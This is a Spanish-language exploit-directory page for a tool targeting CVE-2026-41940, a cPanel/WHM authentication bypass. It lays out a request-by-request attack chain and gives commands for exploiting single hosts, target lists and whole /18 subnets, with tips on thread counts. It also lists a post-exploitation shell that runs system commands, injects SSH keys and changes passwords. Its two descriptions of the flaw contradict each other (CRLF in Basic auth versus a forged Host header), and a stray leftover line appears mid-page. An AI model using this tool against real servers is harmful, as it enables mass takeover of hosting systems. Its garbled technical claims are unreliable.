Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/anach-ai/cve-2026-41940
Autenticación y AutorizaciónEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónMovimiento LateralExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónComando y ControlRed Teaming
GitHub
4hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
anach-ai/cve-2026-41940

CVE-2026-41940

CVE-2026-41940 — cPanel/WHM Bypass de Autenticación por Dr.Anach, inyección CRLF en el manejador de autenticación Basic de `cpsrvd` → acceso no autenticado a la API de WHM → RCE como root. Todos los cPanel desde v11.40 afectados.

Ver Repositorio
Compartir

CVE-2026-41940 — Omisión de Autenticación en cPanel/WHM

Autor: Dr.Anach | Contacto: @dranach | Licencia: MIT


Resumen

Inyección CRLF en el manejador de autenticación Basic de cpsrvd → acceso no autenticado a la API de WHM → Ejecución Remota de Código como root. Todos los cPanel desde v11.40 afectados.

Cadena de Ataque

#PasoSolicitud
1Crear sesiónGET /login/?user=root
2Inyección CRLFAuthorization: Basic <base64> — la contraseña lleva carga útil \r\n
3Promoción de cachéGET /cpsess<ID>/login/?login_only=1
4EjecutarGET /cpsess<ID>/execute/API/func

Instalación

root@kitploit:~
pip install requests colorama

A continuación se muestra el README.md final: amigable, práctico y centrado en hacer el trabajo.


Exploit de Omisión de Autenticación en cPanel — CVE-2026-41940

Autor: Dr.Anach · Telegram: @dranach
Versión: 2.0.0
Licencia: Solo para pruebas de seguridad autorizadas


Qué Hace Esto

Explota CVE-2026-41940, una omisión de autenticación en cPanel & WHM (versiones 11.x a 106.x). La vulnerabilidad permite a un atacante no autenticado acceder a endpoints restringidos — incluyendo la función de restablecimiento de contraseña — mediante el envío de un encabezado Host manipulado que apunta a un servidor controlado por el atacante.

Viene con tres modos:

ModoIndicadorQué
Objetivo único-t

Instalación

Requisitos

  • Python 3.7+ (probado en Windows, Linux, macOS)
  • Librería requests
root@kitploit:~
pip install requests

Sin otras dependencias. La expansión CIDR usa el módulo ipaddress integrado de Python — no es necesario instalar nada adicional en Windows.


Inicio Rápido

Probar un objetivo único

root@kitploit:~
python main.py -t example.com
python main.py -t 192.168.1.100

Probar una lista de objetivos (uno por línea)

root@kitploit:~
python main.py --batch targets.txt --threads 50

Formato de targets.txt:

root@kitploit:~
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

Escanear una subred completa (CIDR)

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

Esto expande 192.168.128.0/18 (16,384 IPs), realiza una verificación rápida de puerto en cada una, y solo intenta la explotación contra hosts donde el puerto 2087 (cPanel/WHM) está abierto.


Opciones Completas

root@kitploit:~
  -t, --target        IP o dominio único
  --batch FILE        Archivo con objetivos (uno por línea)
  --port-scan CIDR    Rango CIDR a escanear (ej., 192.168.128.0/18)
  -p, --port          Puerto objetivo (predeterminado: 2087)
  --ssl               Usar HTTPS (predeterminado: HTTP)
  --timeout SEC       Tiempo de espera de conexión en segundos (predeterminado: 10)
  --threads N         Máximo de hilos concurrentes (predeterminado: 50)
  --proxy PROXY       Proxy HTTP (ej., http://127.0.0.1:8080)
  -v, --verbose       Salida detallada con información de depuración
  --no-banner         Suprimir banner
  --version           Mostrar versión

Entendiendo la Salida

root@kitploit:~
[+] 192.168.130.45:2087 — ¡VULNERABLE!
    → URL de restablecimiento de contraseña: http://192.168.130.45:2087/reset?token=abc123
    → Tiempo de respuesta: 1.23s

[-] 192.168.131.10:2087 — No vulnerable
    → Motivo: No se encontró endpoint de restablecimiento de contraseña

[!] 192.168.129.22:2087 — Error: Conexión rechazada

Los resultados guardados como JSON están estructurados por host con estado de vulnerabilidad, tokens extraídos y detalles de respuesta sin procesar.


Ejemplo Práctico: Escaneando un /18 en Windows

El escenario por el que probablemente estás aquí:

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

Cómo funciona:

  1. Expande 192.168.128.0/18 → 16,384 IPs internamente
  2. Prefiltra con un escaneo rápido de conexión TCP en el puerto 2087 (omite hosts muertos)
  3. Explota solo hosts con un puerto abierto
  4. Informa hosts vulnerables con tokens de restablecimiento extraídos

Consejos de hilos:

  • --threads 100 funciona bien (respeta los límites predeterminados de sockets)
  • Para escaneos más rápidos en buenas conexiones: --threads 200
  • Si encuentras limitación de velocidad: reduce a --threads 30 y aumenta --timeout

CVSS y Riesgo

CVSS 9.1 (Crítico) — No se requiere autenticación, sin interacción del usuario, baja complejidad.

Impacto

  • Restablecimiento de contraseña no autorizado para cualquier cuenta de cPanel
  • Toma completa de la cuenta
  • Escalada de privilegios de limitado a administrador en algunas configuraciones

Remediación

  • Actualizar cPanel/WHM a la última versión parcheada
  • Validar los encabezados Host en el servidor
  • Restringir el acceso a WHM por IP cuando sea posible

Legal

Esta herramienta es para solo evaluaciones de seguridad autorizadas. Debes ser propietario de los objetivos o tener permiso por escrito del propietario antes de realizar pruebas. Los autores no asumen ninguna responsabilidad por el uso indebido.

Comandos del Shell Interactivo

root@kitploit:~
help       Mostrar comandos
info       Información del servidor
passwd     Cambiar contraseña
accounts   Listar cuentas de cPanel
enum       Enumeración completa
shell      Ejecutar comando del sistema
ssh-add    Inyectar clave SSH
exec       Ejecutar una línea de Python
exit       Salir

Detección

Verificar archivos de sesión:

root@kitploit:~
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

Registros sospechosos en /usr/local/cpanel/logs/access_log:

root@kitploit:~
/login/?user=root        → creación de sesión
/login/?user=root        → inyección CRLF
/cpsess*/login/?login_only=1  → promoción de caché
/cpsess*/execute/*       → abuso de API

Mitigación

root@kitploit:~
# 1. Aplicar parche a la versión corregida
# 2. Rotar todas las contraseñas y claves SSH
# 3. Purgar sesiones
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

Créditos

  • Vulnerabilidad: Sina Kheirkhah / watchTowr Labs
  • Framework: Dr.Anach (@dranach)
Descargar herramienta
Prueba una IP o dominio
Archivo por lotes--batchCarga una lista de objetivos desde un archivo
Escaneo CIDR--port-scanExpande una subred y prueba cada host activo